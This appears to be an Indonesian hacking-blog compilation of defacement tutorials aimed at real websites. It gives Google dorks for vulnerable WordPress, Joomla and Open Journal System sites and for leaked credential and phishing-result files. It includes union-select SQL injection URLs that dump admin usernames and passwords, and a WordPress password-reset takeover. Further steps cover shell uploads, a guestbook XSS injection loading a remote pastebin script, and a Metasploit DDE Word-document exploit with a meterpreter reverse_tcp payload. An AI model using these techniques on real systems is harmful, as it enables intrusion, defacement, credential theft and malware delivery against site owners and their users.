Termux ID: Tutorial -->
hay guys:v ok kali ini cakil akan share tutorial deface wordpress sql injection reset password
ok gausah lama lama kuy cekidot :v

1.dork : inurl:?fbconnect_action=myhome
(kembangin njer)
2.kalo udah nemu target tambahkan exploit "fb"
http://localhost/??fbconnect_action=myhome&fbuserid=1

(liat gambar)
3.buka havij masukan url nya
4.klik tables
5.klik get tables
6.cari wp-users




(liat gambar)
7.klik get column
(liat gambar)
8.nah cari column user_login dan user activation key
9.nah tinggal dump deh
10.kalo sudah masukan di url
wp-login.php?action=rp&key="kode aktivasi"&login="user login"
contoh
http://localhost/wp-login.php?action=rp&key=uyrenxvjhadsblala&login=cakil
11.masukan new password nya :v (terserah lu :v)
12.klo sudah masuk tinggal tanem shell deh :v 

wkwkwkwkw :v gampang kan 
tunggu tutor selanjutnya ea 

tutorial sql injection wordpress + reset password (havij)

hallo guys :v ketemu lgi sama cakil :v
ok kali ini cakil akan share tutorial dorking hasil web phising :v
cekidot:v!

1. masuk ke google
2.dork
  • intext:@ymail.com | @gmail.com | @hotmail.com | @yahoo.co.id ext:txt "facebook"
  • ext:txt "username" "password" @ymail.com OR @yahoo.com OR @msn.com OR @gmail.com 2015 
  • filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test="
  • intext:charset_test= email= default_persistent= inurl:”passes” 
  • inurl:”passwords”
  • inurl:”credentials” -search -download -techsupt -git -games -gz -bypass -exe
  • intext++++++email:password:ext:txt 2017
(kembangkan :v)
3.cari target
(liat gambar)
4.nah klik target yang kamu pilih :v
(liat gambar)
nah udah keliatan tuh hasil nya :v
sangad mudah bukan :v
oke sekian dan terima kasih
dorking phising paypal :v ?
nih guys
dork:
intext:"email=" & intext:"pass=" & intext:"charset_test=" intext:@ymail.com | @gmail.com | @hotmail.com | @yahoo.co.id ext:txt "paypal passwd" 2015

silahkan tinggalkan comment kalo kamu suka postingan ini

tutorial dorking web phising

hallo guys :v ketemu lagi neh sama cakil :v
kali ini cakil akan share tutorial deface wordpress easy-comment-uploads

langsung ae yuk
simak baik baik ok
Dork: inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

kembangkan ea :v 
1.masukan dork ke google
2.cari target
(liat gambar)

nah kalo sudah upload file mu
nah udah muncul tuh :v
file akses
localhost/wp-content/uploads/tahun/bulan/filemu

mudah sangad bukan ?
ok sekian dan terima kasih


tutorial deface wordpress easy-comment-uploads

hay guys :v cie ketemu lagi neh sama cakil :v
ok kali ini cakil akan share tutorial deface joomblo :v eh joomla Easy Youtube Gallery 1.0.2
sql Injection :v vulnerability. sebenernya ini poc lama :v tapi gpp lah :v
siapa tau ada yg blm tau :v

langsung ae yuk simak :v
1.dork : disini
2.oke masukan dork ke google :v (di hatiku juga boleh ko wkwkwkw)
3.check eror nya dolo ea
masukan kode
+order+by+1--+ <- ga eror
+order+by+2--+ <- ga eror
dan ternyata eror di 15


(liat gambar)
(yang berarti column hanya di 14)

4.oke sekarang kita masukan kode
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
nanti akan terlihat seperti ini
http://localhost/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+&defaultvideo=3&Itemid=121&limitstart=18

(liat gambar)
nah udah keliatan tuh nmr nya :v
5.oke kita dump table nya :v
kode : sini

(liat gambar)
(nah udah muncul tuh :v)
6.skrng kita dump column nya
kode : group_concat(username,0x3a,password)
contoh
http://localhost/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+union+select+1,2,3,4,5,6
,group_concat(username,0x3a,password),8,9,10,11,12,13,14+from+bak_users--+&defaultvideo=3&Itemid=121&limitstart=18
(liat gambar)
nah udah ketemu tuh admin sama pw nya hehehe :v
sangad mudah bukan :v
oke sekian dan terima kasih :v
kalo ada yang tidak tau silahkan nanya di fp kami
sini bree

tutorial joomla Easy Youtube Gallery 1.0.2 sql Injection vulnerability

hay guys kali ini cakil akan share tutorial melacak orang dengan ip geolocation di termux
(ip address)
simak yuk baik baik
1.buka termux
ketik
$apt update && apt upgrade
$apt install python
$apt install git
$git clone https://github.com/maldevel/IPGeolocation.git
$cd IPGeolocation
$chmod +x ipgeolocation.py
$pip install -r requirements.txt
$python ipgeolocation.py -t ip
contoh
$python ipgeolocation.py -t 69.69.69.104
(liat gambar)nah kalo udah selesai.
ambil koordinatnya :v
contoh
google.com/map/-6 38919394,829483/289292/blabalabla
nah buka google map
pastekan kode nya di google map.
kalo pngn lebih jelas. install google earth di ps. atau langsung lewat browser :v
(liat gambar)ok sekian dan terimakasih
tunggu update an terbaru kami ya :)
kritik or saran silahkan hubungi fp kami
sini bree :v

Tutorial Melacak Orang Menggunakan IP Address Dengan Termux

    Cara Mencari Akses Shell Di CMS Open Journal System

        Mungkin banyak yg coba deface methode Open Journal System ini karna caranya lumayan cukup gampang , tapi banyak orang yg bermasalah pada saat mencari akses Sell / Script yg telah di upload.ya kali ini gw akan bahas tentang Cara Mencari Akses Shell Di CMS Open Journal System.

Yg pasti kalian udah tau atau mengerti cara deface Open Journa System bagi yg belum coba baca atau tanya ke mbah google , langsung aja ikutin step by step nya.

1.Setelah kalian pilih-pilih target , kalian jangan langsung register + tanam shell , Kalian periksa dahulu apakah direktori tempat shell kalian nanti ada atau kagak..

2.Cara cek nya simple, cukup tambahkan /files di belakang url target kalian contoh : http://target.co.li/files



                                                  (NOT VULN / TIDAK BISA DI TUSBOLD :V)
Kalau sering dapet yg kagak vuln mungkin itu evek ketampanan (faktor face) cuba ganti muka atau download yg baru...mungkin dg otak vokepers mu itu bisa mencari cara untuk mencari akses file nya.



                                                              (BISA VULN BISA TIDAK)

     Nah kalau yg kayak gini bisa vuln , bisa tidak .



                                                      (ITS VULN /DI TUSBOLD ENAK :V)


Yg kayak gini vuln , jngan lupa pastikan ada direktori Journalsnya biar di langkah selanjutnya gk bingung :v ok kita lanjutkan coly nya....

3.kalo udah vuln kayak gambar yg no 3 (kurang lebih , karna terkdang ada tampilan yg berbeda)

4.Setelah tanam shell berhasill, kalian balik lagi ke direktori files, kaya contoh di atas (gambar no.3), lalu kalian klik direktori journals -> (keluar angka-angka) pas di bagian di situ mungkin ada direktori angka yang lebih dari 1 -> ke direktori articles -> direktori id user kalian (angka, baca di tutrial deface ojs) -> lanjut ke direktori submission -> lanjut lagi ke direktori original -> nama file kalian.


Udah paham cok??kalau belum makanya jangan kebanyakan nonton vidio anu .....
sekian dulu totor gk guna kali ini , kalau masih bingung atau yg belum mengerti tutorial di atas bisa tanya-tanya ke SINI (awas orang ganteng  hati2 naksir) atau bisa juga ke SONO.

Spesial thanks to :"Kurniawan PS , Rival " "Garuda Security Hacker And Hacker Patah Hati Team .

Sekian salam jomblo.

Cara Mencari Akses Shell Di CMS Open Journal System



Maxteroit - Akhir akhir ini telah ditemukan sebuah cara untuk memanfaatkan salah satu fitur yang ada pada Microsoft Windows untuk melakukan suspicous activity. Fitur itu tak lain ialah DDE, kabarnya pula fitur ini telah banyak disalahgunakan untuk menyebarkan malware dan ransomeware.

Sekilas Mengenai Microsoft DDE Vulnerability

DDE ( Dynamic Data Exchange ) merupakan salah satu fitur dalam Microsoft Office yang memungkinkan dua buah aplikasi untuk membagikan data yang sama. Sayangnya beberapa waktu lalu telah ditemukan cara memanfaatkan fitur tersebut untuk melakukan arbitary code execution. Salah satu keunggulan kelemahan ini adalah tak ada pop up warning , tak membutuhkan macros, dan tak memerlukan memory corruption.

Alat Tempur

Langkah-langkah

  • -         Download script dengan perintah

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
  • -         Simpan di

/usr/share/metasploit-framework/modules/exploits/windows/
  • -         Jalankan Metasploit
  • -         Jalankan perintah 

use exploits/windows/dde_delivery

  • -     Setting payload 

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.x.x

set LPORT 4444

  • -         Jalankan exploit
  • -         Copy script yang muncul pada module dan buka VirtualMachine kalian
  • -         Buka Microsoft Word
  • -         Klik tab Insert > Quick Parts > Fields > Ok


  •  -        Klik kanan pada kalimat yang muncul, pilih Toggle Field Code

  • -         Ganti dengan script yang kita dapat dari module


  • -         Save !
  • -         Buka file doc yang telah kita simpan tadi.
  • -         Syarat sah agar exploit ini bekerja adalah si korban harus mengklik yes pada 2 window yang keluar


  • -         Bila berhasil maka, Selamat !!! Kamu Baru Saja Mendapatkan Meterpreter Session!!!


Pencegahan

            Untuk mencegah serangan yang serupa maka kita bisa melakukan hal berikut :

Buka Office Button > Word Options > Advanced > uncheck Update Automatic Link at Opens.


Dan cara yang terampuh ialah jangan pernah membuka file mencurigakan apapun yang kalian dapat dari email maupun sumber lain.



Mengeksploitasi Celah 0day Microsoft DDE Vulnerability

hay guys ketemu lagi neh sama cakil :v
ok kali ini cakil akan share tutorial deface js overlay add buku tamu :)
langsung ae yuk

Dork : Inurl:bukutamu.html

script buku tamu nya guys
Touch Me Babby :v
edit bagian http://solar.doit.sk/index,php <- ganti sama web bekas defacean kamu
ganti alert ('Hacked?') <- ganti sesuka mu
ok kalo udah di edit.
1.masukan dork nya di google :v
2.cari target
3.klo udah ketemu.
masukan kode
<script type="text/javascript" src="link pastebin script jso yang udah kamu edit"></script></p>
name: isi bebas
email :isi bebas
pesan :isi kode <script type="text/javascript" src="http://pastebin.com/raw/BPZtTNrk"></script></p>
(liat gambar biar jelas)
4.ok kalo vuln nanti tampilan akan berubah
nah sukses tuh :v
ok sekian dan terima kasih :)
nitip nick boleh kan : Mr.cakil

tutorial deface jso add buku tamu